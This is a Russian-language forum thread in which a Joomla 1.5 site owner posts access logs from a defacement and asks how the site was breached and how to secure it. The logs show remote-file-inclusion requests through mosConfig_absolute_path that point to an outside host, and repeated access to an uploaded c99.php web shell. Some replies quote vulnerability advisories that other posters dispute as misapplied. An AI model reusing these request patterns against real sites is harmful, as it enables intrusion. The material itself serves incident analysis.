Joomla 1.5 Сайт взломан, предположительно через mosConfig_absolute_path

Сайт взломан: установленно по красочной надписи на главной странице. Админ панель - доступна, но не действует пароль пользователя admin.

Платформа: FreeBSD web04.nic.ru 6.4-RELEASE-p7 FreeBSD 6.4-RELEASE-p7 #7: Sun Oct 4 02:40:13 MSD 2009 root@hdad.nic.ru:/usr/obj/usr/src/sys/HNIC-SMP-ULE-IBM pl#12 i386
Версия MySQL: 4.1.22
Сравнение БД: utf8_general_ci
Версия PHP: 5.2.10
Вэб-сервер: Apache/1.3.37 (Unix) mod_gzip/1.3.26.1a mod_python/2.7.11 Python/2.6.2 PHP/5.2.10 mod_ssl/2.8.28 OpenSSL/0.9.7e-p1 mod_fastcgi/2.4.2
Интерфейс вэб-сервер -> PHP: apache
Версия Joomla: Joomla! 1.5.15 Stable [ Wojmamni Ama Mamni ] 05-November-2009 04:00 GMT
User Agent: Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.2.15 Version/10.01

Обнаружено в логах:
212.227.114.130 - - [21/Nov/2009:00:41:52 +0300] "GET //joomla/index2.php?mosConfig_absolute_path=http://193.111.244.157/zzzz/www.my-site.ru/94 HTTP/1.1" 403 1351 "-" "-"
212.227.114.130 - - [21/Nov/2009:00:41:52 +0300] "GET //joomla/index2.php?mosConfig_absolute_path=http%3A%2F%2F193.111.244.157%2Fzzzz%2Fwww.my-site.ru%2F94 HTTP/1.1" 403 1351 "-" "-"
88.229.79.82 - - [21/Nov/2009:00:47:08 +0300] "GET /templates/beez/c99.php HTTP/1.1" 200 35986 "-" "Opera/9.80 (Windows NT 5.1; U; tr) Presto/2.2.15 Version/10.00"
85.108.187.210 - - [21/Nov/2009:00:47:23 +0300] "GET /templates/beez/c99.php HTTP/1.1" 200 35986 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
85.108.187.210 - - [21/Nov/2009:00:47:24 +0300] "GET /templates/beez/c99.php?act=img&img=home HTTP/1.1" 200 221 "http://my-site.com/templates/beez/c99.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
85.108.187.210 - - [21/Nov/2009:00:47:24 +0300] "GET /templates/beez/c99.php?act=img&img=forward HTTP/1.1" 200 131 "http://my-site.com/templates/beez/c99.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
85.108.187.210 - - [21/Nov/2009:00:47:24 +0300] "GET /templates/beez/c99.php?act=img&img=up HTTP/1.1" 200 211 "http://my-site.com/templates/beez/c99.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
85.108.187.210 - - [21/Nov/2009:00:47:24 +0300] "GET /templates/beez/c99.php?act=img&img=back HTTP/1.1" 200 131 "http://my-site.com/templates/beez/c99.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
85.108.187.210 - - [21/Nov/2009:00:47:24 +0300] "GET /templates/beez/c99.php?act=img&img=refresh HTTP/1.1" 200 212 "http://my-site.com/templates/beez/c99.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
85.108.187.210 - - [21/Nov/2009:00:47:24 +0300] "GET /templates/beez/c99.php?act=img&img=buffer HTTP/1.1" 200 175 "http://my-site.com/templates/beez/c99.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
85.108.187.210 - - [21/Nov/2009:00:47:24 +0300] "GET /templates/beez/c99.php?act=img&img=sort_asc HTTP/1.1" 200 97 "http://my-site.com/templates/beez/c99.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
85.108.187.210 - - [21/Nov/2009:00:47:24 +0300] "GET /templates/beez/c99.php?act=img&img=search HTTP/1.1" 200 262 "http://my-site.com/templates/beez/c99.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
85.108.187.210 - - [21/Nov/2009:00:47:24 +0300] "GET /templates/beez/c99.php?act=img&img=ext_diz HTTP/1.1" 200 1039 "http://my-site.com/templates/beez/c99.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
85.108.187.210 - - [21/Nov/2009:00:47:25 +0300] "GET /templates/beez/c99.php?act=img&img=ext_lnk HTTP/1.1" 200 584 "http://my-site.com/templates/beez/c99.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
85.108.187.210 - - [21/Nov/2009:00:47:25 +0300] "GET /templates/beez/c99.php?act=img&img=small_dir HTTP/1.1" 200 176 "http://my-site.com/templates/beez/c99.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
85.108.187.210 - - [21/Nov/2009:00:47:25 +0300] "GET /templates/beez/c99.php?act=img&img=ext_php HTTP/1.1" 200 91 "http://my-site.com/templates/beez/c99.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
85.108.187.210 - - [21/Nov/2009:00:47:25 +0300] "GET /templates/beez/c99.php?act=img&img=change HTTP/1.1" 200 302 "http://my-site.com/templates/beez/c99.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
85.108.187.210 - - [21/Nov/2009:00:47:25 +0300] "GET /templates/beez/c99.php?act=img&img=download HTTP/1.1" 200 173 "http://my-site.com/templates/beez/c99.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"[/QUOTE]

Что сделано:

1. Перезалиты файлы сайта
2. Изменен пароль и логин администратору
3. удален шаблон beez
4. Проверены права на папки - все корректно
   

На сайте используется компоненты:
CustomQuickIcons 2.1.4 2009.03.30 mic / http://www.joomaax.com
JCE 1.5.7 14 November 2009 Ryan Demmer
JTags 1.5 Summer 2008 Jacek Zielinski
Linkr
OzioGallery 1.0.8 27/04/2008 Alexred
QContacts 1.0.5 December 2008 Massimo Giagnoni
QuiXplorer 1.0.1 July 17th, 2008 Philippe Borowek and The QuiX project
sh404sef 1.0.16_Beta Jan 2, 2009 Yannick Gaultier
Xmap

Насколько я понимаю, сайт был взломан черз переменную mosConfig_absolute_path. Но в каком файле - не понятно.

Прошу совет - Как определить место взлома? и Что можно сделать для предотвращения повторного взлома?

 

Смотрите логи захода по ftp - кто и когда залил файл /templates/beez/c99.php

 

Насчет mosConfig_absolute_path - неверно думаете - ответ сервера 403 - то есть доступ запрещен

 

Скорее всего тупо украден пароль от ftp и залит shell - хотя нужно подробнее анализировать логи

 

Последняя Ёпера и Джумла ниже 1.5 14 уязвимы,
Программа: Joomla! версии до 1.5.15

Опасность: Низкая

Наличие эксплоита: ДА

Описание:
Обнаруженные уязвимости позволяют удаленному пользователю получить доступ к важным данным и изменить некоторые данные в приложении.

1. Уязвимость существует из-за ошибки при обработке XML файлов. Удаленный пользователь может получить данные о версиях установленных модулей.

2. Уязвимость существует из-за неизвестной ошибки в приложении, которая позволяет заменить статьи главной страницы другого пользователя.

URL производителя: www.joomla.org

Решение: Установите последнюю версию 1.5.15 с сайта производителя.

URL адреса:

* http://developer.joomla.org/security/news/306-20091103-core-xml-file-read-issue.html
* http://developer.joomla.org/security/news/305-20091103-core-front-end-editor-issue-.html

Программа: Opera версии 9.64 и 10.01, возможно другие версии.

Опасность: Высокая

Наличие эксплоита: Да

Описание:
Уязвимость позволяет удаленному пользователю скомпрометировать целевую систему.

Уязвимость существует из-за ошибки при выделении пространства для чисел с плавающей запятой. Удаленный пользователь может с помощью специально сформированного Web сайта вызвать повреждение памяти и выполнить произвольный код на целевой системе.

URL производителя: www.opera.com

Решение: Уязвимость устранена в релиз кандидате Opera RC3.

 

А теперь смотри на ссылки
1) Злоумышленник может узнать через XML версии установленных компонентов и подобрать к ним уязвимости (и? если компонент не имеет уязвимостей эта информация злоумышленнику не поможет)
2) Пользователь с правами Автора может изменить статью написанную другим автором!
1-ая это даже не уязвимость а страховка от уязвимостей сторонних компонентов
2-ая это проблем, тем не менее не приводящая к доступу к админке.

Далее, уязвимость в браузере может применяться для взлома компьютера пользователя, а не сервера, на сервере есть апачи, мускуль но никак не браузер.

Asylum - большой минус за дезинформацию и попытки давать советы в областях, знаний в которых недостаточно!

 

Вообще-то проблемы взлома не рекомендуют обсуждать на форумах, так как информацией могут воспользоваться злоумышленники.
Надо связываться напрямую с группой поддержки безопасности Joomla

 

Дезинормацию чего? О предупреждении что все версии 1.5 ниже 15 дырявы? Все подвержены дефейсу, ссылка Уязвимость существует из-за неизвестной ошибки в приложении, которая позволяет заменить статьи главной страницы другого пользователя.
Хотя ошибка в самом деле известна на специализированных форумах, и поиск эксплоита, если знать где искать занимает пять кликов.
Опера к джумла отношения не имеет, у многих это любимый браузер. А автоматическое обновление его бывает выключено

Кто то его читает?

 

И - по ссылке перевод того же что я и написал. Много сайтов у которых каждый зареганный автоматом получает права автора? Процента 2 наверно, не более, насчет XML - как я и сказал это не уязвимость а страховка от кривых компонентов. Каким боком тут приплетена Опера и вовсе не понятно.
Тут все таки не желтая пресса бросаться словами и необоснованными заголовками

 

Секьюрити лаб давно страдает косноязычием,

Поэтому данное нужно читать так: Уязвимость позволяющяя заменить главную страницу пока не описана в публичных ресурсах

 

Вообще то следует хоть раз прочитать источник - гугл транслейт в помощь и не пересказывать то что бабушка шепнула на скамейке.

 

Если б была ссылка на сайт, можно было что то сказать. Могу посоветовать joomscan только не забудь прикрутить свежую базу

 

Вообще я и так читаю, без переводчиков